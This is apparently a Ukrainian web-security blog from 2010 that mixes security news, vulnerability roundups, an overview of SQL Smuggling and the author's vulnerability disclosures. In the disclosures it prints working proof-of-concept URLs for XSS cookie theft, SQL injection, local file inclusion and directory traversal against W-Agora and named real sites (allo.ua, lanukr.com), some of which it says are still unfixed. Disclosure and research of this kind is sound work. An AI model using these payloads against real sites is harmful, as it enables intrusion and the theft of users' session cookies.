Websecurity - Веб безпека

Продовжуючи розпочату традицію, після попереднього відео про використання HTTP Parameter Pollution, пропоную нове відео на веб секюріті тематику. Цього разу відео про новий секюріті продукт від Гугла - Google Web Security. Рекомендую подивитися всім хто цікавиться цією темою.

Google Web Security

В відео розповідається про сучасний стан безпеки в Інтернет, про різніцю між веб фільтрацією та веб безпекою, та про переваги такого метода як веб безпека над веб фільтрацією. А також в загальних рисах розповідається про новий хмарний (cloud) секюріті продукт від Google. Єдине питання тут в тому, чи довірите ви свою безпеку такій компаній як Гугл .

Рекомендую подивитися дане відео для розуміння сучасної ситуації з безпекою в Інтернет.

29.08.2010

У серпні, 27.08.2010, я знайшов Cross-Site Scripting та Local File Inclusion уразливості в W-Agora (це система веб публікації, тобто по суті CMS). Які я також виявив на сайті maidan.org.ua, як і попередні уразливості. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в W-Agora.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

27.10.2010

XSS:

http://site/news/for-print.php3?bn=x&key=1282850719%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/news/for-print.php3?bn=%3Cbody%20onload=alert(document.cookie)%3E
http://site/news/login.php3?bn=x&loginform=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Уразливість працює в версії 4.1.5, але не працює в 4.2.1.

http://site/news/login.php3?bn=%3Cbody%20onload=alert(document.cookie)%3E

Local File Inclusion:

В папці conf:

http://site/news/for-print.php3?bn=1

http://site/news/login.php3?bn=1

В будь-які папці (тільки на Windows-серверах):

http://site/news/for-print.php3?bn=..\1

http://site/news/login.php3?bn=..\1

Уразливі W-Agora 4.2.1 та попередні версії. В останніх версіях системи скрипти php3 мають розширення php. Якщо адміни maidan.org.ua виправили уразливості, то розробник системи дані уразливості не виправив (але після публікації попередніх дірок в багтреках, розробник схоже почав їх виправляти, як мінімум виправив зазначені XSS на офіційному сайті системи).

В жовтні місяці Microsoft випустила 16 патчів. Що значно більше ніж у вересні. Що стало новим рекордом (попередній був у серпні, коли компанія випустила 14 патчів).

У жовтневому “вівторку патчів” Microsoft випустила черговий пакет оновлень, до якого увійшло 16 бюлетней по безпеці. Що закривають 49 уразливостей в програмних продуктах компанії (що також є рекордом). В тому числі чотири патчі виправляють критичні уразливості, які дозволяють виконати довільний шкідливий код на віддаленому комп’ютері, ще десять важливих патчів і два патчі середньої важливості.

Дані патчі стосуються таких продуктів Microsoft як операційні системи Windows XP, Windows Server 2003, Windows Vista, Windows 7, Windows Server 2008 R2, додатків Microsoft Office, браузера Internet Explorer та платформи .NET.

В даній добірці уразливості в веб додатках:

• PowerDNS Recursor up to and including 3.1.7.1 can be spoofed into accepting bogus data (деталі)
• PowerDNS Recursor up to and including 3.1.7.1 can be brought down and probably exploited (деталі)
• Critical PowerDNS Recursor Security Vulnerabilities: please upgrade ASAP to 3.1.7.2 (деталі)
• PHPKIT WCMS - Multiple stored Cross Site Scripting Issues (деталі)
• TTVideo 1.0 Joomla Component SQL Injection Vulnerability (деталі)
• Novell Teaming ajaxUploadImageFile Remote Code Execution Vulnerability (деталі)
• Joomla input sanitization errors (XSS) (деталі)
• XSS vulnerability in Spitfire search (деталі)
• XSS vulnerability in Spitfire (деталі)
• LittleCMS vulnerabilities (OpenJDK, Firefox, GIMP, etc. impacted) (деталі)

05.01.2010

У травні, 06.05.2009, я знайшов Insufficient Anti-automation, Cross-Site Scripting та SQL Injection уразливості на сайті http://www.allo.ua (онлайн магазин). Серед XSS є також persistent XSS, які можуть використовуватися для інфікування сайта вірусами. Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно дірок на сайтах онлайн магазинів в останнє я писав про уразливості на www.officepro.com.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

26.10.2010

Insufficient Anti-automation:

http://www.allo.ua/register.php

http://www.allo.ua/forget.php

В формах немає захисту від автоматизованих запитів (капчі).

XSS:

Це single-user persistent XSS (коли користувач залогінений на сайті).

POST запит до сторінки профайла http://www.allo.ua/account.php. Код спрацює на сторінці профайла (поля Имя, Email, Телефон, Адрес 1, Адрес 2, Город/Поселок, Область) та на кожній зовнішній сторінці сайта (поле Имя).

XSS (persistent):

Через поле Имя в профайлі можна провести атаку на сторінках продуктів:

http://www.allo.ua/products/comments/product/
http://www.allo.ua/products/details/product/

XSS:

• alert(document.cookie)
• alert(document.cookie)
• цікавий
• html включення

SQL Injection:

http://www.allo.ua/index.php?page=search&start_do_search=yes&search_text=1&pcat_id=-1%20or%20version()=5

Дані уразливості переважно досі не виправлені. Лише виправили persistent XSS через поле Имя.

Виявлені можливості міжсайтового скриптінга в браузерах Google Chrome і Flock та в WebKit.

Числені умови міжсайтового скриптінга.

• Flock Browser: window.open() Method Javascript Same-Origin Policy Violation (XSS) (деталі)
• Flock Browser: javascript: url with a leading NULL byte can bypass cross origin protection (XSS) (деталі)
• Flock Browser: A malicious RSS feed can bypass cross origin protection (XSS) (деталі)
• Flock Browser: A malformed favourite can bypass cross origin protection (XSS) (деталі)

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://uac.com.ua - інфекція була виявлена 18.10.2010. Зараз сайт не входить до переліку підозрілих.
• http://graphotrans.com - інфекція була виявлена 24.10.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 3 рази протягом останніх 90 днів. Зараз сайт входить до переліку підозрілих.
• http://cluboz.net - інфекція була виявлена 24.10.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 1 раз протягом останніх 90 днів. Зараз сайт не входить до переліку підозрілих.
• http://stalservise.com - інфекція була виявлена 25.10.2010. Зараз сайт входить до переліку підозрілих.
• http://smoloskyp.org.ua - інфекція була виявлена 04.09.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 2 рази протягом останніх 90 днів. Зараз сайт не входить до переліку підозрілих.

05.02.2010

У червні, 28.06.2009, я знайшов SQL Injection, Local File Inclusion, Directory Traversal та Full path disclosure уразливості на сайті http://www.lanukr.com. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше.

25.10.2010

SQL Injection:

http://www.lanukr.com/?mid=-1%20or%20version()%3E4

http://www.lanukr.com/?fun=-1%20or%20version()%3E4

Local File Inclusion (через SQL Injection):

http://www.lanukr.com/?fun=-1%20union%20select%201,0,char(46,46,47,105,110,100,101,120,46,112,104,112),1

Включення index.php.

Directory Traversal (через SQL Injection):

http://www.lanukr.com/?fun=-1%20union%20select%201,0,char(46,46,47,46,104,116,97,99,99,101,115,115),1

Виведення .htaccess.

Full path disclosure:

http://www.lanukr.com/?fun=-1

Дані уразливості вже виправлені, за виключенням Full path disclosure. Але дірок на сайті все ще чимало.

Раніше я розповідав про SQL Smuggling атаки. SQL Smuggling - це техніка проведення SQL Injection атак з обходом захисних систем. Використовуючи дану техніку можна обходити як вбудовані у веб додаток захистні фільтри, так і встановлені на сервері IDS, IPS та WAF системи.

В зазначеній статті розповідається про різні методи SQL Smuggling. Але дана стаття була написана в 2007 році і з тих пір були виявлені нові цікаві методи SQL Smuggling, про які я зараз розповім.

До нових методів SQL Smuggling відносяться:

1. Використання специфічного кодування в SQL запиті.

Прикладом такої уразливості у веб додатках та атаки на неї є SQL Injection уразливість в WordPress через кодування. Уразливість була виявлена Abel Cheung в 2007 році.

Атака могла бути проведена на сайти на WP, що використовали для БД кодування GBK або Big5. Особливість роботи даних кодувань, що є відмінною від UTF-8 та інших кодувань, дозволяла обходити захисні фільтри.

2. Обрізання рядку в MySQL.

В 2008 році Стефаном Есером була розроблена атака на обрізання рядку в MySQL. Прикладом використання даного методу атаки є уразливість в WordPress 2.6.1.

Використовуючи особливість роботи MySQL можна обрізати дані, що передаються до БД, і при деяких умовах, це можна використати для проведення атак. При цьому жодні захисні системи не зафіксують атаки і тому вона пройде приховано, бо дані до сайта посилаються звичайні, і лише за рахунок особливості роботи СУБД MySQL виникає можливість проведення атаки.

Виявлені численні уразливості безпеки в Mozilla Firefox, Thunderbird, SeaMonkey.

Уразливі продукти: Mozilla Firefox 3.5, Firefox 3.6, Thunderbird 3.0, Thunderbird 3.1, SeaMonkey 2.0.

Численні пошкодження пам’яті, переповнення буфера, міжсайтовий скриптінг, проблеми з SSL/TLS, виконання коду.

• Mozilla Foundation Security Advisory 2010-64 (деталі)
• Mozilla Foundation Security Advisory 2010-65 (деталі)
• Mozilla Foundation Security Advisory 2010-66 (деталі)
• Mozilla Foundation Security Advisory 2010-67 (деталі)
• Mozilla Foundation Security Advisory 2010-68 (деталі)
• Mozilla Foundation Security Advisory 2010-69 (деталі)
• Mozilla Foundation Security Advisory 2010-70 (деталі)
• Mozilla Foundation Security Advisory 2010-71 (деталі)
• Mozilla Foundation Security Advisory 2010-72 (деталі)